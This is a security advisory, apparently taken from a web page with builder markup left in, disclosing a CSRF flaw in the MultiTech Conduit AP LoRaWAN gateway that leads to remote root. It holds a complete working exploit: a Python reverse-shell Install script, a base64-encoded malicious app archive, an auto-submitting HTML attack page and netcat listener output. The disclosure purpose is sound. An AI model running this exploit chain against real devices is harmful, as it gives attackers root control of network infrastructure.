[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.21.0\" _module_preset=\"default\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<\/p>\n
Advisory ID<\/strong>: usd-2023-0004 <\/p>\n MultiTech Conduit AP MTCAP2-L4E1 is a LoRaWAN access point to provide connectivity of IoT assets. The application uses API requests to load content dynamically into the frontend. Trying to send the same request from the page of the attacker would be blocked by the user's browser. These types of requests are ideal to perform a CSRF attack on any endpoint of the API, since the SOP is not triggered with such a request.<\/p>\n The application allows uploading and installing custom applications with Python, C++ or NodeJS applications. This functionality can be abused in a CSRF attack to receive remote command execution on the system.<\/p>\n To install a custom app on the router, the application archive must meet a certain archive format. In particular the Install<\/strong> file in the archive can be modified. The second line of the script contains a python reverse shell payload. To automate the attack, an HTML web page was created that prepares the file upload, uploads the created file and then triggers the installation of this file. The encoded archive is embedded into the HTML. The first form would prepare the file upload. The second form performs the file upload. The third form is used to install the uploaded application. As already discussed above, a reverse shell payload was inserted into the Install<\/strong> file. <\/p>\n [\/et_pb_text][et_pb_code _builder_version=\"4.21.0\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" width=\"50%\"]
Product<\/strong>: MultiTech Conduit AP MTCAP2-L4E1 (https:\/\/www.multitech.com\/models\/92507614LF)
Affected Version<\/strong>: MTCAP2-L4E1-868-042A Firmware 6.0.0
Vulnerability Type<\/strong>: CSRF
Security Risk<\/strong>: High (based on CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:R\/S:C\/C:H\/I:H\/A:H == 9.6)
Vendor URL<\/strong>: https:\/\/www.multitech.com<\/a>
Vendor Status<\/strong>: Fixed
CVE number<\/strong>: CVE-2023-25201
First Published<\/strong>: Not published yet<\/p>\nDescription<\/h1>\n
The webinterface allows configuration of settings like user management, LoRaWAN, Firewall and custom applications.
During an assessment it was discovered that the whole webinterface of the access point is vulnerable to cross-site request forgery attacks (CSRF) attacks.
An attacker might be able to cause a user to unknowingly send requests to a vulnerable application.
If the user has previously authenticated himself towards the application, those requests will be executed according to the user's privileges.
Should the user possess administrative privileges this might enable the attacker to fully compromise the system.
A proof-of-concept exploit was written to show remote code execution exploiting the CSRF vulnerability.
In order to exploit this vulnerability an attacker needs to fool the user into visiting a specially crafted site of the attacker.<\/p>\n
All API requests are transmitted via HTTPS with a JSON body.
Such API requests are sent by JavaScript.
Other websites are not permitted to send those requests to the API because the Same-Origin-Policy prevents cross-site requests with a application\/json<\/strong> MIME type.
The listing below shows such a request.<\/p>\nPOST \/api\/command\/app_pre_upload HTTP\/1.1\nHost: 192.168.0.107\nCookie: token=78A1B1B4662172CE4C87AA5D4477\nContent-Length: 73\nContent-Type: application\/json\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/109.0.5414.120 Safari\/537.36\nConnection: close\n\n{\"info\":{\"fileName\":\"express-hello-world-1.4.tar.gz\",\"fileSize\":1689541}}\n<\/pre>\n
Typical bypasses to perform CSRF attacks are changing the Content-Type to text\/plain<\/strong> and attaching the JSON or abusing lax CORS headers.
In case of the access point another approach was used.
The Burp Extension Param Miner was used to discover additional hidden GET parameters for the request.
In our case it was found that the server accepted the parameter data<\/strong> for every API endpoint.
This parameter can contain the whole JSON which is usually transmitted in the request body.
It was determined that the server would also accept such a request below.<\/p>\nPOST \/api\/command\/app_pre_upload?data={\"info\"%3a{\"fileName\"%3a\"express-hello-world-1.4.tar.gz\",\"fileSize\"%3a1689541}} HTTP\/1.1\nHost: 192.168.0.107\nCookie: token=EC8C377E51447AF14BA16704D328D7E\nAccept: application\/json\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/109.0.5414.120 Safari\/537.36\nConnection: close\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 0\n<\/pre>\nProof of Concept<\/h1>\n
MultiTech has documented the archive format in the following post http:\/\/www.multitech.net\/developer\/software\/aep\/creating-a-custom-application\/<\/a>
The easiest method is to download the <https:\/\/webfiles.multitech.com\/wireless\/mtcdt-x-210a\/express-hello-world-1.4.tar.gz><\/a> files and modify certain files.
The following snippet shows the archive format.<\/p>\nrevshell.tar.gz\n\u251c\u2500\u2500 Install\n\u251c\u2500\u2500 manifest.json\n\u251c\u2500\u2500 package.json\n\u251c\u2500\u2500 Start\n\u2514\u2500\u2500 status.json\n<\/pre>\n
If a new custom app is installed on the router the Install<\/strong> file will be executed one time.
The Start<\/strong> file will be executed everytime the custom app is started.
The content of the file can be overriden with the commands that should be executed.<\/p>\n#!\/bin\/bash\npython3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"192.168.0.109\",9999));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'\n\nexit 0\n<\/pre>\n
The modified archive can then be base64 encoded to weaponize it in the next step.
The following listing shows the command to encode the archive.<\/p>\n$ base64 revshell.tar.gz -w 0 H4sIABXG02MAA+1YTY+bMBTcM7\/CpYcFiXhtY6Bp1EOl9pDLXlbqpWolPkziLrEt22wSVfvfa0KSbittcyJtuszF6L2HjZHnzcBcGJs3zdWQQAhlWQLciLMEPR17EEoApnFKMxojQgDCJKP4CqBBn2qP1u1fu0dZMK23f6g7le+3Ao7jheD1q5uCi5siN0vPU1u7lCIGkxJc85WS2gJpImW3kZHlPbMz866\/gP0QhDMDSykEK20Q+HhKIE7fQAQxmvrR1CEMZ5+lgVWrSGBgzRsmZBBGdVhLDWrARYAiHJHwy8ytAo3K1yLwzdIPrz2PbbgFyPvbb+j\/xioXvGbGwm9GioHWcHxIU\/o8\/3GSHfhPugTCFBMy8v8c+O4B4L9X6jZfMf8t8DV7YNows2RN40f75CcX4lJ0eQzpMfyBmVJzZfepjxvVSG5\/v+tWWma6vO89jmT+16Dy8j5fsCHpf5L\/hFLgJJ\/QOEkynO74H9Mz878o8i3Tz9edyl8y\/8We\/GyjNDNm0pFfTtZSN1XPZqX5Q267GqtbtgtVTDFRMVHyHbu7ecBxhm4yCnG8bxbgydS5qBpW5HpX8zV2ZgEdatbcmdG+lxBIXNyFH8emMSju3Om3A69xyv+7BvBT\/1HS+X\/XCkb9Pwd+8f+j435xcKfftmZQ+T+p\/yhLO\/2PMSLu+3\/n\/9HZv\/9fsv4rXjnRRQfjPhe17ER43v8bYlUEitYCIS3YMgt0KwQXi9HOjxgxYsQl4we0\/Cg8ABgAAA==\n<\/pre>\n
Such an HTML is displayed in the listing below.<\/p>\n<html>\n<body>\n<form action=\"[https:\/\/192.168.0.107\/api\/command\/app_pre_upload?data={"info"%3a{"fileName"%3a"revshell.tar.gz","fileSize"%3a574}}\"]() target=\"_blank\" method=\"POST\">\n <input type=\"submit\" value=\"Prepare File Upload\" \/>\n<\/form>\n<form enctype=\"multipart\/form-data\" method=\"post\" action=\"[https:\/\/192.168.0.107\/api\/command\/app_upload\"]() target=\"_blank\" name=\"fileinfo\">\n <p>\n <label>File to stash:\n <input type=\"file\" name=\"archivo\" \/>\n <\/label>\n <\/p>\n <p>\n <input type=\"submit\" value=\"Upload File\" \/>\n <\/p>\n<\/form>\n<div id=\"output\"><\/div>\n<script>\n function _base64ToArrayBuffer(base64) {\n var binary_string = window.atob(base64);\n var len = binary_string.length;\n var bytes = new Uint8Array(len);\n for (var i = 0; i < len; i++) {\n bytes[i] = binary_string.charCodeAt(i);\n }\n return bytes.buffer;\n }\n\n \/\/ Get a reference to our file input\n const fileInput = document.querySelector('input[type=\"file\"]');\n\n \/\/ Create a new File object\n const payload = 'H4sIABXG02MAA+1YTY+bMBTcM7\/CpYcFiXhtY6Bp1EOl9pDLXlbqpWolPkziLrEt22wSVfvfa0KSbittcyJtuszF6L2HjZHnzcBcGJs3zdWQQAhlWQLciLMEPR17EEoApnFKMxojQgDCJKP4CqBBn2qP1u1fu0dZMK23f6g7le+3Ao7jheD1q5uCi5siN0vPU1u7lCIGkxJc85WS2gJpImW3kZHlPbMz866\/gP0QhDMDSykEK20Q+HhKIE7fQAQxmvrR1CEMZ5+lgVWrSGBgzRsmZBBGdVhLDWrARYAiHJHwy8ytAo3K1yLwzdIPrz2PbbgFyPvbb+j\/xioXvGbGwm9GioHWcHxIU\/o8\/3GSHfhPugTCFBMy8v8c+O4B4L9X6jZfMf8t8DV7YNows2RN40f75CcX4lJ0eQzpMfyBmVJzZfepjxvVSG5\/v+tWWma6vO89jmT+16Dy8j5fsCHpf5L\/hFLgJJ\/QOEkynO74H9Mz878o8i3Tz9edyl8y\/8We\/GyjNDNm0pFfTtZSN1XPZqX5Q267GqtbtgtVTDFRMVHyHbu7ecBxhm4yCnG8bxbgydS5qBpW5HpX8zV2ZgEdatbcmdG+lxBIXNyFH8emMSju3Om3A69xyv+7BvBT\/1HS+X\/XCkb9Pwd+8f+j435xcKfftmZQ+T+p\/yhLO\/2PMSLu+3\/n\/9HZv\/9fsv4rXjnRRQfjPhe17ER43v8bYlUEitYCIS3YMgt0KwQXi9HOjxgxYsQl4we0\/Cg8ABgAAA=='\n var test = _base64ToArrayBuffer(payload)\n\n \/\/const testblob = b64toBlob(test, \"application\/gzip\");\n\n\n\n const myFile = new File([test], 'revshell.tar.gz', {\n type: 'application\/gzip',\n lastModified: new Date(),\n });\n\n \/\/ Now let's create a DataTransfer to get a FileList\n const dataTransfer = new DataTransfer();\n dataTransfer.items.add(myFile);\n fileInput.files = dataTransfer.files;\n<\/script>\n<form action=\"[https:\/\/192.168.0.107\/api\/command\/app_install?data={"info"%3a{"appId"%3a"revshell","appName"%3a"revshell","appFile"%3a"revshell.tar.gz"}}\"]() method=\"POST\" target=\"_blank\">\n <input type=\"submit\" value=\"Install uploaded file\" \/>\n<\/form>\n\n<script>\n\nconst sleep = async (milliseconds) => {\n await new Promise(resolve => {\n return setTimeout(resolve, milliseconds)\n });\n};\n\nconst testSleep = async () => {\n document.forms[0].submit();\n await sleep(2000);\n document.forms[1].submit();\n await sleep(2000);\n document.forms[2].submit();\n}\ntestSleep();\n<\/script>\n<\/body>\n<html>\n<\/pre>\n
The HTML consists of three different forms.
An attacker could present this HTML to an authenticated administrator to trigger the installation of the custom application.
Note that all the forms are filled and requests are automatically submitted to the LoRaWAN gateway, if the HTML is visited.<\/p>\n
This request is needed to reserve the file name and file size.<\/p>\n
We discovered that the file upload with XHR was not possible because CORS prevents browsers to attach the user's session cookie to such a request.
The solution we came up with was to perform a file upload with multipart form and fill the file content with the base64 decoded archive.
Idea and code snippet were extracted from the following blog post https:\/\/pqina.nl\/blog\/set-value-to-file-input\/<\/a>
The base64 encoded archive is statically embedded in the JavaScript and will be decoded upon file initialization.
This form will also be filled automatically and submitted to the server.<\/p>\n
After the previous two forms have been completed and submitted, this form is also submitted.
The server should respond to all of those requests with following message.<\/p>\n{\n \"code\" : 200,\n \"status\" : \"success\"\n}\n<\/pre>\n
To receive the reverse shell connection the attacker needs to open the TCP port 9999 on his local system.
The following listing shows a TCP listener and a successful connect back.
To proof remote command execution, the command whoami<\/strong> was executed to detemine the user running the reverse shell payload.
The server responds with root<\/strong> showing that the all applications installed are executed with the highest privileges.<\/p>\n$ nc -lvp 9999\nlistening on [any] 9999 ...\n192.168.0.107: inverse host lookup failed: Unknown host\nconnect to [192.168.0.109] from (UNKNOWN) [192.168.0.107] 46190\nsh-5.0# whoami\nwhoami\nroot\n<\/pre>\n